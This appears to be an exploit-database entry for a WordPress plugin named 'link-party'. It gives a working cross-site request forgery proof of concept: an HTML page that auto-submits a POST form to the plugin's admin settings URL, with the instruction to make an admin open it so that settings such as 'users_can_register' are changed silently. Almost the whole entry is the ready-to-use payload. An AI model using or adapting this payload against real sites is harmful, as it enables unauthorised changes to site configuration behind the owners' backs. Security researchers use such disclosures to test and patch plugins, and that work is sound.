## https://sploitus.com/exploit?id=WPEX-ID:D16F6BA0-A47D-413F-A6D4-058910441009
Make an admin open the following HTML:
<body onload="document.forms[0].submit()">
<form action="http://localhost:8888/wordpress/wp-admin/options-general.php?page=link-party/includes/admin.php" method="POST">
<input type="text" name="action" value="update">
<input type="text" name="users_can_register" value="0">
<input type="submit" value="csrf">
</form>
</body>
See that the support the plugin option is toggled on/off.